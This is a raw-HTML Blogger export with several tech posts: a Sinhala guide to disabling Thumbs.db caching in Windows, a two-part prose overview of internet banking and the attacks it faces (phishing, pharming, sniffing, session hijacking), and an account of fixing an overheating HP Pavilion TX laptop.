src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJo11J7I8rKzcztvKkSCIrK_acwGPHRId-1gyTipfxZgyfMVbWkbj-JAiVm7g81Zp4yoozAy09U_o_lM2F1Y1X1FwoeoNxXDCHBAYWK6Xp4j4TDQmVQya8B0_6dHLidXzXUj8-Q56jHGI/s400/3.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5651887461946195602" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 208px; " /></a><div style="text-align: center;"><br /></div><div style="text-align: center;">හෝ</div><div style="text-align: center;"><br /></div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5sAW1r-CjFWIPlNrZvgIurFsJLslZhBCsCQaoQUlKFh2gaw3tkgHrJZ3ig_nmNAFNgAqWcNqF1eKJ9GwvrbRhux66qXWtDQZ5R9I88HjpYB9kxstSsA-uo9E5mCcAESlUgXPzrH1xNxU/s1600/2.jpg" style="font-family: Georgia, serif; " onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5sAW1r-CjFWIPlNrZvgIurFsJLslZhBCsCQaoQUlKFh2gaw3tkgHrJZ3ig_nmNAFNgAqWcNqF1eKJ9GwvrbRhux66qXWtDQZ5R9I88HjpYB9kxstSsA-uo9E5mCcAESlUgXPzrH1xNxU/s400/2.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5651887455119741746" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 297px; height: 400px; " /></a></span></span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: Tahoma, verdana, arial, sans-serif; background-color: rgb(255, 255, 255); "><br /></span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: Tahoma, verdana, arial, sans-serif; background-color: rgb(255, 255, 255); ">එවිට කියන Local Group Policy Editor මෙවලම විවෘත වෙනවා.</span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: Tahoma, verdana, arial, sans-serif; background-color: rgb(255, 255, 255); "><br /></span></div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: Tahoma, verdana, arial, sans-serif; background-color: rgb(255, 255, 255); "><span class="Apple-style-span" style="color: rgb(0, 0, 238); font-family: Georgia, serif; -webkit-text-decorations-in-effect: underline; "><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1rReG1NXklGO_H_x-TmqO0fIJrswcXU0BDATw3_8FhqDYpr9AOKr04uD4Gn_K2zqDPpY76ShjydnSV0BZ5XZTadyLl4MNjUNR3duZWRuM4Qee59EbiUe4LDDSkyNi1vPdbNhpUCj8NkI/s400/4.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5651888779300719714" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 252px; " /></span></span></div><div style="text-align: center;"><span class="Apple-style-span" ><br /></span></div><div style="text-align: left;">එහි පවතින විකල්පයන් පහත ආකාරයට විවෘත කරන්න</div><div style="text-align: left;"><ul><li><span class="Apple-style-span" style="font-family: Tahoma, verdana, arial, sans-serif; background-color: rgb(255, 255, 255); ">User Configuration</span></li><li><span class="Apple-style-span" style="font-family: Tahoma, verdana, arial, sans-serif; background-color: rgb(255, 255, 255); ">Administrative Templates</span></li><li><span class="Apple-style-span" style="font-family: Tahoma, verdana, arial, sans-serif; background-color: rgb(255, 255, 255); ">Windows Components</span></li></ul><div><span class="Apple-style-span">එවිට මෙවැන්නක් දකින්න පුලුවන්,</span></div><div><span class="Apple-style-span"><br /></span></div><div><span class="Apple-style-span"><span class="Apple-style-span" style="color: rgb(0, 0, 238); font-family: Georgia, serif; -webkit-text-decorations-in-effect: underline; "><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVKdaZPhyphenhyphenJL4wyvQ89r_xvT_3wdmdXotdl_n3Gbwi3b9TMyjlWAdL112vS8mmhYKRraB_hUTqTkmi4Q2EVNeclaBTUgT6xFc3VE2g3xts7gtPswLTei0uaiekZAF0BU0Ph5WT_N9lURPM/s400/5.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5651890701720088914" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 252px; " /></span></span></div><div style="text-align: center;"><span class="Apple-style-span" ><br /></span></div><div style="text-align: left;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-family: Georgia, serif; -webkit-text-decorations-in-effect: underline; ">එහි වම්පස තිබෙන අප විවෘත කල විකල්පයන් ගෙන් </span></span><span class="Apple-style-span" style="font-family: Tahoma, verdana, arial, sans-serif; background-color: rgb(255, 255, 255); ">Windows Explorer කියන එක තෝරන්න.</span></div><div><span class="Apple-style-span" style="font-family: Tahoma, verdana, arial, sans-serif; background-color: rgb(255, 255, 255); "><br /></span></div><div><span class="Apple-style-span" style="font-family: Tahoma, verdana, arial, sans-serif; background-color: rgb(255, 255, 255); "><span class="Apple-style-span" style="color: rgb(0, 0, 238); font-family: Georgia, serif; -webkit-text-decorations-in-effect: underline; "><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkZZwTl9JBooODhHdSPMJwgYH_s7iNJ_bYMO93k_23uQiC74JLR-TDQecfeh6HZx70gKwmaFSgmvU9AO4qLmb5Uru3y32Q4aSBBbgugCXiRt1xkpvygQDX6pXwJITPCMqM-1uV-96ULwg/s400/6..jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5651891892109832498" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 277px; " /></span></span></div><div style="text-align: center;"><span class="Apple-style-span" ><br /></span></div><div>ඉන්පසු එහි දකුණු පස තියෙන Turn off the caching of thumbnails in hidden.db files කියන විකල්පය ඩ දෙවරක් කිලික් (double click) කරන්න. එවිට Turn off the caching of thumbnails in hidden.db files කියන නමින් වෙනම විශාල රාමුවක් (Window) විවෘත වනවා. එහි පහත පින්තූරයේ දැක්වෙන ආකාරයට Enable කියන විකල්පය තෝරා OK කරන්න.</div><div><br /></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjeok5SZTSwjqE89kS7OMgi6kOZpdpWpeVnOS1vdfPkVrQYdUjmz-urVu8ckhyphenhyphenHdkwtplBWJ6gZvYXILSJF8Qnw-bJdBgiJMOHAyMsUvZdLz8gtF0WvvLsqrvBjaJcN1mc3MZSbcQph4M/s400/7.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5651895177830903746" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 376px; " /></span></div><div style="text-align: center;"><span class="Apple-style-span" ><br /></span></div><div>මෙහි තියෙන අමුතු දේ තමයි මෙතන දිවිත්ව නිශේදනයක් (double negative) තියෙන එක. ඒ නිසා අපිට Thumbs.db ඉවත් කරන්න Disable (නැති කරන්න) වෙනුවට Enable (ඇති කරන්න) කියන විකල්පය තෝරන්න වෙන එක. ඔබ හදිස්සියට Disable තේරුවොත් Thumbs.db ඇති කරන්න අවසර දුන්නා වෙනවා. අමුතුයි නේ? වින්ඩෝස් ඔහොම තමා......</div><div> </div><div><span class="Apple-style-span"><br /></span></div></div><div style="text-align: left;"> </div><div><br /></div></div>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com0tag:blogger.com,1999:blog-7802132138133841506.post-72375370691352132912011-09-08T11:39:00.000-07:002012-01-10T10:02:44.264-08:00Security of Internet Banking (Part 2) - Possible Attacks against an Internet Banking System<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_GGVVTVaHOf-FJP-y9btcM7OQja2JqG77soceOBlvccBE-od2XymV7KC5kpwPygC6WfaoyRPYB_UBa5gtMhU7T7Uy97AKGzkoO1-Ja1jtvEKtF1w9YMlsL-ldfFDKibrWIJFVokzewxI/s1600/images.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 223px; height: 226px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_GGVVTVaHOf-FJP-y9btcM7OQja2JqG77soceOBlvccBE-od2XymV7KC5kpwPygC6WfaoyRPYB_UBa5gtMhU7T7Uy97AKGzkoO1-Ja1jtvEKtF1w9YMlsL-ldfFDKibrWIJFVokzewxI/s400/images.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5650065280722082018" /></a><p class="MsoNormal" style="margin-bottom: 0.0001pt; "><span class="Apple-style-span">An attacker can target on user equipment such as tokens (smart cards), password generators and actions of the user himself. These types of attacks include:</span></p><p class="MsoNormal" style="margin-bottom: 0.0001pt; "><span class="Apple-style-span"><b>Procedural Attacks</b></span></p><p class="MsoNormal" style="margin-bottom: 0.0001pt; "></p><ol><li><span class="Apple-style-span"><i>Hidden code</i> - <span style="line-height: 115%; ">A hidden code within a web page that installs malicious software in user’s terminal. The exploit may target Java runtime support, ActiveX support, multimedia extensions and automated download and running of software through the browser.</span></span></li><li><span class="Apple-style-span"><span style="line-height: 115%; "><i>Worms and bots</i> </span><span style="line-height: 115%; ">– Worms usually search for vulnerabilities and exploit those automatically. This may be an exploitation of instant messaging and chatting communication software which may automatically be deployed using bots.</span></span></li><li><span class="Apple-style-span"><span style="line-height: 115%; "><i>E-</i></span><span style="line-height: 115%; "><i>mails with malicious code</i> – This is e-mail with malicious content such as executable files or HTML code with embedded applets.</span></span></li></ol><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;"><p class="MsoNormal" style="margin-bottom: 0.0001pt; "><span class="Apple-style-span" style="line-height: 18px;"><br /></span></p></span></span><span class="Apple-style-span" style="line-height: 18px; "><b>Token Attack tools</b></span><p></p><p class="MsoNormal" style="margin-bottom: 0.0001pt; "></p><ol><li><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;"><i>S</i></span><span style="line-height: 115%; "><i>martcard analyzers</i> – These expose the security of the smartcard by revealing cryptographic keys and passwords. These include analyzing power consumption of the smart card or time analyzing. These attacks are not easy to implement but very effective.</span></span></li><li><span style="line-height: 115%; "><span style="line-height: 115%; "><span class="Apple-style-span"><i>Smartcard reader manipulator</i> – This attack is applicable to noncertified smartcard readers with insecure interfaces, which may expose the contents of the smartcard.</span></span></span></li><li><span class="Apple-style-span"><span style="line-height: 115%; "><span style="line-height: 115%; ">B</span></span><span style="line-height: 115%; ">rute force attacks with PIN calculations – These attacks mainly focused on breaking the security of tokens that generate random PINs.</span></span></li></ol><p class="MsoNormal" style="margin-bottom: 0.0001pt; "><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;"><b>Phishing</b></span></span></p><p class="MsoNormal" style="margin-bottom: 0.0001pt; "></p><ol><li><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;"><i>S</i></span><span style="line-height: 115%; "><i>ocial engineering</i> – These attacks are based on manipulating user to give up the password, login information or sensitive information through phone calls and other social hangouts.</span></span></li><li><span class="Apple-style-span"><span style="line-height: 115%; "><i>W</i></span><span style="line-height: 115%; "><i>eb page obfuscation</i> – These are links that are not directing the user to <span> </span>corresponding destination that it describes or the using Internet Protocol (IP) addresses instead of universal resource locator (URL) to confuse the user. And this maybe a hidden frames in a web page by using several frames with malicious content, while user only sees the URL of the master frameset. Other method of this is using graphics that spoof the interface of a web browser like the address bar.</span></span></li></ol><p class="MsoNormal" style="margin-bottom: 0.0001pt; "><span class="Apple-style-span"><b><span class="Apple-style-span" style="line-height: 18px;">A</span>ttacks focuses on communication links</b></span></p><p class="MsoNormal" style="margin-bottom: 0.0001pt; "></p><ol><li><span class="Apple-style-span"><i>P</i><span style="line-height: 115%; "><i>harming</i>: This is compromising of domain name servers (DNSs), altering DNS tables and connecting the user to another site other than the banks official web site and user will perform all tasks in the fraudulent site and give all information such as login details.</span></span></li><li><span class="Apple-style-span"><span style="line-height: 115%; "><i>S</i></span><span style="line-height: 115%; "><i>niffing</i>: This attack can be used to capture information such as user name and password. This is masquerading of communication between user client and the bank server).</span></span></li><li><span class="Apple-style-span"><span style="line-height: 115%; "><i>A</i></span><span style="line-height: 115%; "><i>ctive man-in-the-middle attacks</i>: The attacker sends malformed user packets or make more traffic to the web site such as transfer commands, from one account to other.</span></span></li><li><span class="Apple-style-span"><span style="line-height: 115%; "><i>S</i></span><span style="line-height: 115%; "><i>ession hijacking</i>: </span><span class="apple-style-span"><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; ">session hijacking</span></span><span class="apple-converted-space"><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; "> </span></span><span class="apple-style-span"><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; ">is the exploitation of a valid</span></span><span class="apple-converted-space"><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; "> </span></span><span class="apple-style-span"><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; ">computer session—sometimes also called a</span></span><span class="apple-converted-space"><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; "> </span></span><span class="apple-style-span"><i><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; ">session key</span></i><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; ">—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a</span></span><span class="apple-converted-space"><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; "> </span></span><span class="apple-style-span"><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; ">magic cookie</span></span><span class="apple-converted-space"><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; "> </span></span><span class="apple-style-span"><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; ">used to authenticate a user to a remote server. It has particular relevance to</span></span><span class="apple-converted-space"><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; "> </span></span><span class="apple-style-span"><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; ">web developers, as the</span></span><span class="apple-converted-space"><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; "> </span></span><span class="apple-style-span"><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; ">HTTP cookies</span></span><span class="apple-converted-space"><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; "> </span></span><span class="apple-style-span"><span style="line-height: 115%; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; ">used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer</span></span><span style="line-height: 115%; ">.</span></span></li></ol><p class="MsoNormal" style="margin-bottom: 0.0001pt; "><span class="Apple-style-span"><b><span class="Apple-style-span" style="line-height: 18px;">I</span>BS attacks: These are offline attacks against the servers that Internet banking applications hosted</b></span></p><p class="MsoNormal" style="margin-bottom: 0.0001pt; "></p><ol><li><span class="Apple-style-span"><i>B</i><span style="line-height: 115%; "><i>rute force attacks</i>: Brute force attack is based on distributed zombie personal computers, hosting automated programs for username or password based calculation.</span></span></li><li><span class="Apple-style-span"><span style="line-height: 115%; "><i>B</i></span><span style="line-height: 115%; "><span style="line-height: 115%; "><i>ank security policy violation</i>: Changing the banks security policy such as making access control and logging mechanisms weak.</span> </span></span></li><li><span class="Apple-style-span"><i>W</i><span style="line-height: 115%; "><i>eb site manipulation</i>: Exploiting the vulnerabilities of of bank’s web server and permit the alternation of its contents such as links to the login page and redirect user to a fraudulent web site and capture users credentials.</span></span></li></ol><p></p><p></p>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com0tag:blogger.com,1999:blog-7802132138133841506.post-123587564775433122011-09-07T17:53:00.000-07:002011-09-08T13:23:32.216-07:00Security of Internet Banking (Part 1)<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQEnKZNt9Fl6sYri7Z81lqmCy6baLyYW9T_YbVm8v5ki-N9hSzqmIYJNJhWV_CFf4hr9kjYWVmjk9nkORTOG7azwjICDgkqS6eBRH9ElWZBaaIeYijwjylQxH9MF9B9O_e-mM7DPF0Pbo/s1600/online-banking.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 393px; height: 283px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQEnKZNt9Fl6sYri7Z81lqmCy6baLyYW9T_YbVm8v5ki-N9hSzqmIYJNJhWV_CFf4hr9kjYWVmjk9nkORTOG7azwjICDgkqS6eBRH9ElWZBaaIeYijwjylQxH9MF9B9O_e-mM7DPF0Pbo/s400/online-banking.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5650087045542108994" /></a><br /><span class="Apple-style-span"><b>Brief Introduction to Internet Banking</b></span><div><span class="Apple-style-span"><b><br /></b></span></div><div><span class="Apple-style-span"><span class="Apple-style-span">I</span><span class="Apple-style-span" style="line-height: 18px; ">nternet has become one of key role in bringing a new way of how we interact with other people and it has opened a new dimension in the way of doing business.</span></span></div><div><span class="Apple-style-span" style="line-height: 18px; "><span class="Apple-style-span"><br /></span></span></div><div><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px; ">I</span><span class="Apple-style-span" style="font-family: Calibri, sans-serif; line-height: 18px; ">nternet banking allows customers to conduct their financial transaction via internet by visiting a web site. Internet banking has lot of functionalities which are specific to each banking application. But broadly the functions fall into several categories.</span></span></div><div><ul><li><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;">T</span></span><span style="line-height: 115%; font-family: Calibri, sans-serif; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; ">ransactional (e.g., performing a financial transaction such as an account to account transfer, paying a bill, wire transfer, apply for a loan, new account, etc.)</span></span></li></ul><ol><li style="line-height: 18px;"><span class="Apple-style-span"><span class="Apple-style-span">P</span><span style="line-height: 115%; font-family: Calibri, sans-serif; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; ">ayments to third parties, including</span><span style="line-height: 115%; font-family: Calibri, sans-serif; "> bill payments <span style="background: white">and telegraphic/wire transfers</span></span></span></li><li style="line-height: 18px;"><span class="Apple-style-span"><span style="line-height: 115%; font-family: Calibri, sans-serif; "><span style="background: white">Fund transfers </span></span><span style="line-height: 115%; font-family: Calibri, sans-serif; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; ">between a customer's own</span><span style="line-height: 115%; font-family: Calibri, sans-serif; "> transactional account <span style="background:white">and</span> savings accounts</span></span></li><li style="line-height: 18px;"><span class="Apple-style-span"><span style="line-height: 115%; font-family: Calibri, sans-serif; ">I</span><span style="line-height: 115%; font-family: Calibri, sans-serif; ">nvestment <span style="background:white">purchase or sale</span></span></span></li><li><span class="Apple-style-span" style="line-height: 18px; "><span class="Apple-style-span"><span style="line-height: 115%; font-family: Calibri, sans-serif; "><span style="background:white">L</span></span><span style="line-height: 115%; font-family: Calibri, sans-serif; ">oan <span style="background:white">applications and transactions, such as repayments of enrollments</span></span></span></span></li></ol><ul><li><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;">Non-transitional (e.g., online statements, cheque links, cobrowsing, chat)</span></span></li></ul><ol><li style="line-height: 18px;"><span class="Apple-style-span"><span class="Apple-style-span">Vi</span><span style="line-height: 115%; font-family: Calibri, sans-serif; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; ">ewing recent transactions</span></span></li><li style="line-height: 18px;"><span class="Apple-style-span"><span style="line-height: 115%; font-family: Calibri, sans-serif; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; ">Down</span><span style="line-height: 115%; font-family: Calibri, sans-serif; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: white; background-position: initial initial; background-repeat: initial initial; ">loading</span><span style="line-height: 115%; font-family: Calibri, sans-serif; "> bank statements<span style="background:white">, for example in</span> PDF <span style="background:white">format</span></span></span></li><li style="line-height: 18px;"><span style="line-height: 115%; font-family: Calibri, sans-serif; "><span style="background:white"><span class="Apple-style-span">Viewing images of paid cheques</span></span></span></li></ol><ul><li style="line-height: 18px;"><span class="Apple-style-span">Financial Institution Administration</span></li><li style="line-height: 18px;"><span class="Apple-style-span">Management of multiple users having varying levels of authority</span></li><li style="line-height: 18px;"><span class="Apple-style-span">Transaction approval process</span></li></ul><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;"><br /></span></span></div><div><span class="Apple-style-span" style="line-height: 18px; "><b><span class="Apple-style-span">Security Issue in Internet Banking</span></b></span></div><div><span class="Apple-style-span" style="line-height: 18px; "><b><span class="Apple-style-span"><br /></span></b></span></div><div><span class="Apple-style-span"><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;">Dr.</span></span>. David Chaum, CEO of DigiCash said that “Security is simply the protection of interests.People want to protect their own money and bank their own exposure. The role of government is to maintain the integrity of and confidence in the whole system. With electronic cash, just as with paper cash today, it will be the responsibility of government to protect against systemic risk. This is a serious role that cannot be left to the micro-economic interests of commercial organizations.”</span></div><div><span class="Apple-style-span"><br /></span></div><div><span class="Apple-style-span">The security of information is one of the biggest concerns of an Internet user. For Internet banking users and organizations such as banks with dedicated Internet connections face the risk of someone from the Internet gaining unauthorized access or sneak to their network. Especially due to the sensitive nature of the information changed the internet banking systems are highlighted targets. The Citibank $10 million break-in is one example of how the system is vulnerable to hackers.</span></div><div><span class="Apple-style-span"><br /></span></div><div><span class="Apple-style-span">Being vulnerable will make a bank to lose the trust of its customers and the brand reputation in the market.</span></div><p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="font-size: 12.0pt;mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LK"><o:p></o:p></span></p><p class="MsoNormal"><span style="font-size:12.0pt;line-height:115%"><o:p></o:p></span></p>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com0tag:blogger.com,1999:blog-7802132138133841506.post-58342146299172279392011-09-05T12:18:00.000-07:002011-09-05T13:05:59.963-07:00HP Pavilion TX Laptop Has Nothing On The Screen After Turing On?<div style="text-align: left;"><span class="Apple-style-span">I have a HP Pavilion TX 2500 laptop which is quite awesome when considering about the touch screen, rotatable screen, penabled vacom.. etc. I bought this nearly two and half years ago and still working very well despite the problem I faced recently which is the topic of this </span><span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "></span><span class="Apple-style-span">post.</span></div><span class="Apple-style-span"><div><br /></div><div>Here is my HP laptop,</div><div><br /></div><span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH13viwAoQSNvSTr40Y4gDlV5LaM_1K8G0dBlyKmI7Em9wqjIDojlk8KtwUoBj0Wng6HSNeWz_tItL56bWdF_ix9xcY4U5X-K75p10LcWRG9mtqguiIN1nGnJfPU6H35CW_YlsMjotXgc/s400/IMAG0327.jpg" style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 238px;" border="0" alt="" id="BLOGGER_PHOTO_ID_5648959775155575650" /></span><div style="text-align: center;"><br /></div><div>It has AMD Turion X2 processor and ATI vga and came with Windows Vista originally but it was too slow with Vista hence I installed Windows 7. After installing Windows 7 I could see a significant speed up of performance. All drivers for Windows 7 are freely available in <a href="http://www8.hp.com/us/en/support-drivers.html">HP Support and Drivers website</a>. </div><div><br /></div></span><span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxkESbPLEPbNii4T5yyQkeThKA1TIFJo1P_F8WUunOsQlIApSihJnP7vMuVbI_1ge7-DKzGFxgLNo9u0Zle-T4Pu7HgPA4uucBDk6ZjpD8kJi5nJYHJ9XnxGmp0n2wcC7_OlTf9vhTvBA/s400/IMAG0330.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5648961734282508498" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 238px; " /></span><div><div style="text-align: center;"><span class="Apple-style-span" ><br /></span></div><div style="text-align: left;">From the very first day I started using this laptop I realized that this baby is little bit too hot :D</div><div style="text-align: left;">Because of the AMD processor this laptop burns like hell. In first few days I was concerned (Even this is a laptop I can't keep it on my lap coz it's too hot for me) and always aimed a fan towards the laptop. But with the time passes on I learned to ignore it. And I realized that even hot much it gets hot never slows down. So I ignored. </div><div><br /></div></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCkut-Epyf7cE-MulM0zCuEf3ae1vcQWVZKUh0lav_QCwF4Bf3coegwzkOVg1QEUbFp-D2LSlL89Kh7Bg202uCm4f-j-QfjXww-ADJ3ZXHnKd3x4OKcYcHXOIATp_9OIrWq_eCV_rzk-8/s400/1zf7rs7.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5648963873428082338" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 300px; " /></span></div><div><br /></div><div>And there is a story I must tell one day I went to a laptop repair place with one of my friends to ask for laptop battery cell replacement. Then I saw a TX laptop actually TX 1000 laptop there to be fixed. So I ask around what the wrong, I have the same model...etc. So that guy gave me a prophecy which is "One day your lap will turn on but there will nothing on the screen if it happens bring it here it is a known issue for HP Pavilion TX laptops". It was also nearly two years ago. So recently this guys amazing prophecy came true. I faced the exact thing. </div><div><br /></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB7dJw2ibjq6MCP8eufookaw9PNGJWwXVvew_dlD7BX31mRvytDuoo4w28Bdnk3SsEP-m6tZMbIG3Tiv-8bZq7CeVDWKGoA0Q7u4ba4WQDO_Jh8AlIWMrIZanD5b_mre-sBlMHtgohdMw/s400/IMAG0328.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5648966313316132066" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 238px; " /></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "><br /></span></div><div>So what should I do. Go find the guy and beat him or sue him? No I didn't do that. But I looked for reasons why this happened so I get to know that this is related to the massive heat this laptop generates. After a long time of heating the VGA chips get burn and work no more. So I had to replace VGA chips. And there is a possibility along with this issue the motherboard also may not work. These all photos are taken after fixing the laptop. She works well now!!</div><div><br /></div><div>And I must say using this laptop is fun you can do some showing off and grab attention with its awesome features but the screen again a leap. It has this washed away look. You cant see things properly in outside in daylight and to side views.</div><div><br /></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOBpzb9IyNnv0DGQWVIlcW-ak0Lj1cKiBq07v7FhufTNEHVPSKtJBzq0mNKunBpopx1TYoImm_gwbtIzLCrpmwNlgccWJtlxm-jFPso57I7vdpsHcDy3u38iff5lll5IJN0cNDVLw7uro/s400/IMAG0331.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5648969120443262450" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 238px; " /></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "><br /></span></div><div><br 